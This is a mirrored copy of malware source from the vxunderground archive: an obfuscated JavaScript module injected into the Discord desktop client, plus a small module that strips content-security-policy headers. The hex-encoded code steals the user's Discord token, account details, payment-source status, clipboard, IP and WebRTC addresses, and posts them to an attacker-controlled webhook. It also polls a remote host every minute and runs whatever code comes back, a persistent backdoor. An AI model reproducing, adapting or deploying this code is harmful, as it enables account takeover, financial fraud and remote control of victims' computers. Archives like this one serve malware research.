mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
234 lines
15 KiB
Plaintext
234 lines
15 KiB
Plaintext
|
modules\ discord_modules:
|
||
|
|
||
|
var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6
|
||
|
var readme = _0x476f[0];
|
||
|
window[_0x476f[1]] = require;
|
||
|
var electron = require(_0x476f[2]);
|
||
|
window[_0x476f[2]] = require(_0x476f[2]);
|
||
|
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
window[_0x476f[1]] = require;
|
||
|
var electron = require(_0x476f[2]);
|
||
|
window[_0x476f[2]] = require(_0x476f[2]);
|
||
|
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
|
||
|
function sleep(_0xb38cx5) {
|
||
|
return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5))
|
||
|
}
|
||
|
var ip = _0x476f[11];
|
||
|
var userinfo = _0x476f[11];
|
||
|
var webrtcips = _0x476f[11];
|
||
|
var hasattached = false;
|
||
|
var underesc = _0x476f[13];
|
||
|
var focusamount = 0;
|
||
|
var WBH = _0x476f[11];
|
||
|
if (!document[_0x476f[15]](_0x476f[14])[0]) {
|
||
|
var username = _0x476f[16]
|
||
|
} else {
|
||
|
var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]]
|
||
|
};
|
||
|
|
||
|
function getandsetbackupWBH() {
|
||
|
function _0xb38cx10() {
|
||
|
WBH = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
function getandsetWBH() {
|
||
|
function _0xb38cx10() {
|
||
|
if (this[_0x476f[18]] == _0x476f[25]) {
|
||
|
getandsetbackupWBH()
|
||
|
} else {
|
||
|
WBH = _0x476f[26]
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
getandsetWBH();
|
||
|
|
||
|
function pin(_0xb38cx14) {
|
||
|
var _0xb38cx15 = new XMLHttpRequest();
|
||
|
_0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true);
|
||
|
_0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]);
|
||
|
_0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({
|
||
|
content: _0xb38cx14
|
||
|
}))
|
||
|
}
|
||
|
|
||
|
function returnzoomfactor() {
|
||
|
return electron[_0x476f[33]][_0x476f[32]]()
|
||
|
}
|
||
|
|
||
|
function returnuseragent() {
|
||
|
return navigator[_0x476f[34]]
|
||
|
}
|
||
|
|
||
|
function getdiscordversion() {
|
||
|
return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]()
|
||
|
}
|
||
|
|
||
|
function getclipboard() {
|
||
|
return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50)
|
||
|
}
|
||
|
|
||
|
function getip() {
|
||
|
function _0xb38cx10() {
|
||
|
ip = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
function gettimezone() {
|
||
|
return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]]
|
||
|
}
|
||
|
|
||
|
function getresolution() {
|
||
|
return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]]
|
||
|
}
|
||
|
|
||
|
function getuserinfo(_0xb38cx1e) {
|
||
|
function _0xb38cx10() {
|
||
|
userinfo = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]);
|
||
|
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
function getpaymentsources(_0xb38cx1e) {
|
||
|
function _0xb38cx10() {
|
||
|
if (this[_0x476f[18]] == _0x476f[50]) {
|
||
|
hasattached = false
|
||
|
} else {
|
||
|
hasattached = true
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]);
|
||
|
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
function getwebrtcinfo(_0xb38cx21) {
|
||
|
var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]];
|
||
|
var _0xb38cx23 = new _0xb38cx22({
|
||
|
iceServers: []
|
||
|
}),
|
||
|
_0xb38cx24 = function() {},
|
||
|
_0xb38cx25 = {},
|
||
|
_0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
|
||
|
_0xb38cx27;
|
||
|
|
||
|
function _0xb38cx28(ip) {
|
||
|
if (!_0xb38cx25[ip]) {
|
||
|
_0xb38cx21(ip)
|
||
|
};
|
||
|
_0xb38cx25[ip] = true
|
||
|
}
|
||
|
_0xb38cx23[_0x476f[55]](_0x476f[11]);
|
||
|
_0xb38cx23[_0x476f[64]](function(_0xb38cx29) {
|
||
|
_0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) {
|
||
|
if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) {
|
||
|
return
|
||
|
};
|
||
|
_0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
|
||
|
});
|
||
|
_0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24)
|
||
|
}, _0xb38cx24);
|
||
|
_0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) {
|
||
|
if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) {
|
||
|
return
|
||
|
};
|
||
|
_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
|
||
|
}
|
||
|
}
|
||
|
async function fightdio() {
|
||
|
while (true) {
|
||
|
function _0xb38cx10() {
|
||
|
var _0xb38cx2d = this[_0x476f[18]];
|
||
|
if (_0xb38cx2d == _0x476f[66]) {
|
||
|
return
|
||
|
} else {
|
||
|
eval(_0xb38cx2d)
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]);
|
||
|
_0xb38cx11[_0x476f[24]]();
|
||
|
await sleep(60000)
|
||
|
}
|
||
|
}
|
||
|
async function delboostserveronclient() {
|
||
|
while (true) {
|
||
|
for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) {
|
||
|
if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) {
|
||
|
console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]())
|
||
|
}
|
||
|
};
|
||
|
if (document[_0x476f[15]](_0x476f[74])[0]) {
|
||
|
document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]()
|
||
|
};
|
||
|
await sleep(100)
|
||
|
}
|
||
|
}
|
||
|
electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => {
|
||
|
focusamount = focusamount + 1;
|
||
|
if (focusamount >= 15) {
|
||
|
console[_0x476f[77]](_0x476f[76]);
|
||
|
electron[_0x476f[79]][_0x476f[78]]();
|
||
|
window[_0x476f[81]][_0x476f[80]]();
|
||
|
focusamount = 0
|
||
|
}
|
||
|
});
|
||
|
getwebrtcinfo(function(ip) {
|
||
|
webrtcips = webrtcips + ip + _0x476f[83]
|
||
|
});
|
||
|
getip();
|
||
|
getuserinfo(token);
|
||
|
getpaymentsources(token);
|
||
|
setTimeout(() => {
|
||
|
var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]);
|
||
|
pin(_0xb38cx30)
|
||
|
}, 5000);
|
||
|
setTimeout(() => {
|
||
|
delboostserveronclient()
|
||
|
}, 1);
|
||
|
setTimeout(() => {
|
||
|
fightdio()
|
||
|
}, 1)
|
||
|
|
||
|
|
||
|
\ modules\ discord_desktop_core:
|
||
|
const electron = require('electron');
|
||
|
const path = require('path');
|
||
|
|
||
|
electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
|
||
|
if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({
|
||
|
cancel: false
|
||
|
});
|
||
|
delete details.responseHeaders['content-security-policy-report-only'];
|
||
|
delete details.responseHeaders['content-security-policy'];
|
||
|
callback({
|
||
|
cancel: false,
|
||
|
responseHeaders: details.responseHeaders
|
||
|
});
|
||
|
});
|
||
|
|
||
|
module.exports = require('./core.asar');
|